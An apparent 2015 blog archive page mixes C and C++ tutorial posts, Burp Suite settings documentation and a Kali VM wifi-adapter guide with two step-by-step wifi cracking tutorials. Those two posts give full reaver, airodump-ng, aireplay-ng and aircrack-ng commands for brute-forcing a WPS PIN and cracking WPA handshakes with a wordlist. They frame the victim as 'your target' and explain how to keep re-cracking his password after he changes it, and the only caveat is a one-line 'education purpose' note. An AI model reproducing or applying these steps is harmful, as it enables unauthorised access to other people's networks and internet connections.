Tuesday, May 12, 2015
Tuesday, April 7, 2015
C Programming
C programming is a popular computer programming language which is widely used for system and application software. Despite being fairly old programming language, C programming is widely used because of its efficiency and control. This tutorial is intended for beginners who does not have any prior knowledge or have very little knowledge of computer programming.
Theory | Video Tutorials | ||
English | Hindi | ||
Fundamentals of C | |||
1. Basic of C | |||
Decision and Loop Control Statement in C | |||
Array and Subscript | |||
Strings | |||
Functions | |||
Structure and Union | |||
Pointers | |||
Files | |||
C Preprocessor and Command Line Arguments | |||
Graphics Using C | |||
Standard Library Functions | |||
Like it ? Share it.
Monday, March 23, 2015
Crack wifi Password and WPS PIN without Dictionary Attack
What is WPS ?
Wi-Fi Protected Setup is known as WPS. It is a wireless networking standard that tries to make connections between a router and wireless devices faster and easier. Security researcher Stefan Viehböck said, the WPS PIN is highly vulnerable to brute force attacks. The eight-digit PIN is stored by routers in two blocks of four digits each. The router checks the first four digits separately from the last four digits. A hacker can brute-force the first block of four digits and move on to the second block. A smart hacker with the right tools can brute-force the pin within a day.In this tutorial we will learn how to crack wifi WPS PIN and Wifi Password what’s more we will learn how can we crack our same target wifi again and again using WPS PIN within Seconds.
Note - Only for Education Purpose
Requirements:
- Kali Linux OS
- External Wifi
- Target Wifi Router
1. Open Terminal
(Click image for large view)
2. Write airmon-ng and Press Enter. You will see your Wifi Interface, Chipset and Driver.
3. Write airmon-ng start wlan0 and Press Enter
Where wlan0 is my interface. It can be different in your System so write it as per your own Interface.
4. Write wash –i mon0 --ignore-fcs and Press enter. You will see your Target Wifi’s BSSID, Channel, WPS Locked Status and ESSID. Press Ctrl + C to stop this scan.
5. Write reaver –i mon0 –b E8:94:F6:01:0C:60 –d 40 –S –N –vv and Press Enter
Where E8:94:F6:01:0C:60 is my target wifi BSSID (write your own target’s BSSID) , 40 is delay for trying per Pin, You can increase or decrease this timer. If you want to know about other terms like –S –N then write reaver and Press Enter in a new terminal.
After running above command (actually reaver is a tool) you will see “Associated with E8:94:F6:01:0C:60 (ESSID: geekyshows.com)”. It is a positive sign of cracking process. Sometime you will see “Failed to associate with E8:94:F6:01:0C:60 (ESSID: geekyshows.com)” which means Your target wifi has no network access right now but it doesn’t mean you can’t crack his wifi. You will have to try after sometime.
Now at the end you will see that you have successfully cracked your target wifi’s WPS PIN and Password.
Note - It takes time to crack but it will provide you positive result. You will have to wait at least 24 hours or less.
6. Now we have our target’s wifi WPS PIN so it doesn’t matter if your target recognizes that someone using his internet and how frequently your target changes wifi password. Just because we have target’s WPS PIN we can crack his wifi password again and again till he doesn’t change his WPS PIN.
7. Now Our target is changing his wifi password his old wifi password was kalilinux which we have cracked previously but now he is changing his password with a new password rajhere192. So let’s see how we will crack his new password once again by using WPS PIN within 5 second.
8. Write reaver –i mon0 –b E8:94:F6:01:0C:60 –p 01140200 –vv and Press Enter
Where E8:94:F6:01:0C:60 is Target’s BSSID and 01140200 is WPS PIN.
You do not need to wait 24 hours this time because we have attacked him with particular WPS PIN So, Now within 5 Second you will crack his new password.
(Click image for large view)
Now our Tutorials are available on Youtube. Click Below
Like it ? Share it.
Wednesday, March 11, 2015
Why do we use iostream and namespace in C++
#include<iostream>
or
# include<iostream.h>
# include<iostream.h>
- Istream class supports Input function.
- Ostream class supports output function.
All objects are included in iostream file So, we can use input or output statement in our programs.
using namespace std;
- It includes all C++ standard libraries.
- We do not use this in old IDE like Turbo C++ but we have to use this in all new IDE like Code Blocks, Dev C++ etc.
Friday, March 6, 2015
How to Crack Wifi WPA WPA2 password in Kali Linux with Dictionary Attack
Requirements:
- Kali Linux
- Wifi Adapter
- Wordlist
Note – If you are using Kali linux in VMware then you need external wifi adapter but if you are using Kali Linux along with Win7 or Win8 etc then you can use this method with your internal wifi.
1. Open Terminal
(Click image for large view)
2. Write arimon-ng and press Enter
3. Write airmon-ng start wlan0 and Press Enter after pressing enter you will see that your monitor mode enabled on mon0 as well there are some process running so we need to kill these process.
4. We are killing all process one by one with kill command
5. Write airodump-ng mon0 and Press Enter
6. Write airodump-ng –c 1 –w geekyshows –bssid E8:94:F6:01:0C:60 mon0
Where 1 is our target CH, geekyshows is a file name you are write as per your favorite one and E8:94:F6:01:0C:60 is your target address.
7. Open new Terminal
8. Write aireplay-ng -0 0 –a E8:94:F6:01:0C:60 mon0 and press Enter (2nd/New terminal)
9. You will see WPA handshake : E8:94:F6:01:0C:60 in your 1st terminal. If you are not able to see this then there is something wrong with your process. Press ctrl + C in both terminal to stop handshake.
10. Close 1st terminal and write ls and Press Enter, in new terminal. It will show your file name which you have saved.
11. Write aircrack-ng –w /root/Desktop/wordlist.txt geekyshows-01.cap and Press Enter. After sometime you will find out the Key/Password of your target wifi.
(Click image for large view)
Now Our Tutorials are also available in Video. Just Click below Icon
Like it ? Share it.
Saturday, February 21, 2015
Connect External Wifi in Kali linux VMware
As we all know that we can’t connect wifi through internal wifi adapter if you are using Kali Linux in VM (Virtual machine). If you want to connect your wifi then you need an external wifi adapter so in this tutorial we will learn how can we connect an external wifi in Kali linux which is installed in VM.
Requirements:
- Kali linux Installed in VM
- External Wifi adapter
1. Install Driver and Software in your main System
(Click image for large view)
2. Turn on Your Kali Linux OS there you will find a small icon of your wireless device. Click on the wireless device icon then Click on Connect.
3. Now Click on Network Icon then Click on your available wifi network.
4. Write your wifi password and click on connect.
5. Wait for a while and you are connected.
(Click image for large view)
Now our tutorials are available on Youtube. Just click below icon
Like it ? Share it.
Tuesday, February 10, 2015
Introduction Burp Suite Part IX (Option Tab)
Suite Options
This tab contains settings to control how Burp handles platform authentication, upstream proxy servers, SOCKS proxy, timeouts, hostname resolution, and out-of-scope requests.
Platform Authentication
These settings let you configure Burp to automatically carry out platform authentication to destination web servers. Different authentication types and credentials can be configured for individual hosts.
Supported authentication types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication.
The "Prompt for credentials on platform authentication failure" option causes Burp to display an interactive popup whenever an authentication failure is encountered.
(Click Image for large view)
Upstream Proxy Servers
These settings control whether Burp will send outgoing requests to an upstream proxy server, or directly to the destination web server.
You can define multiple rules, specifying different proxy settings for different destination hosts, or groups of hosts. Rules are applied in sequence, and the first rule that matches the destination web server will be used. If no rule is matched, Burp defaults to direct, non-proxied connections.
You can use wildcards in the destination host specification (* matches zero or more characters, and ? matches any character except a dot). To send all traffic to a single proxy server, create a rule with * as the destination host. Leave the proxy host blank to connect directly to the specified host.
For each upstream proxy you configure, you can specify an authentication type and credentials if required. Supported authentication types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication.
SOCKS Proxy
These settings let you configure Burp to use a SOCKS proxy for all outgoing communications. This setting is applied at the TCP level, and all outbound requests will be sent via this proxy.
If you have configured rules for upstream HTTP proxy servers, then requests to upstream proxies will be sent via the SOCKS proxy configured here.
If the option "Do DNS lookups over SOCKS proxy" is enabled, then all domain names will be resolved by the proxy. No local lookups will be performed.
Timeouts
These settings specify the timeouts to be used for various network tasks. You can specify the following timeouts:
Normal - This setting is used for most network communications, and determines how long Burp will wait before abandoning a request and record that a timeout has occurred.
Open-ended responses - This setting is only used where a response is being processed which does not contain a Content-Length or Transfer-Encoding HTTP header. In this situation, Burp waits for the specified interval before determining that the transmission has been completed.
Domain name resolution - This setting determines how often Burp will re-perform successful domain name look-ups. This should be set to a suitably low value if target host addresses are frequently changing.
Failed domain name resolution - This setting determines how often Burp will reattempt unsuccessful domain name look-ups.
Hostname Resolution
These settings enable you to specify mappings of hostnames to IP addresses, to override the DNS resolution provided by your computer.
Each hostname resolution rule specifies a hostname, and the IP address that should be associated with that hostname. Rules can be individually enabled or disabled.
This feature can be useful to ensure correct onward forwarding of requests when the hosts file has been modified to perform invisible proxying of traffic from non-proxy-aware thick client components.
Out-of-Scope Requests
This feature can be used to prevent Burp from issuing any out-of-scope requests. It can be useful when you need to guarantee that no requests are made to targets that are not in-scope for your current work. Even if your browser makes requests for out-of-scope items, the outgoing requests will be dropped by Burp.
You can enable this feature for the current Target scope. Alternatively, you can define a custom scope using URL-matching rules.
(Click Image for large view)
Source : Burp Suite Official Site
Like it ? Share it.
Subscribe to:
Posts (Atom)




































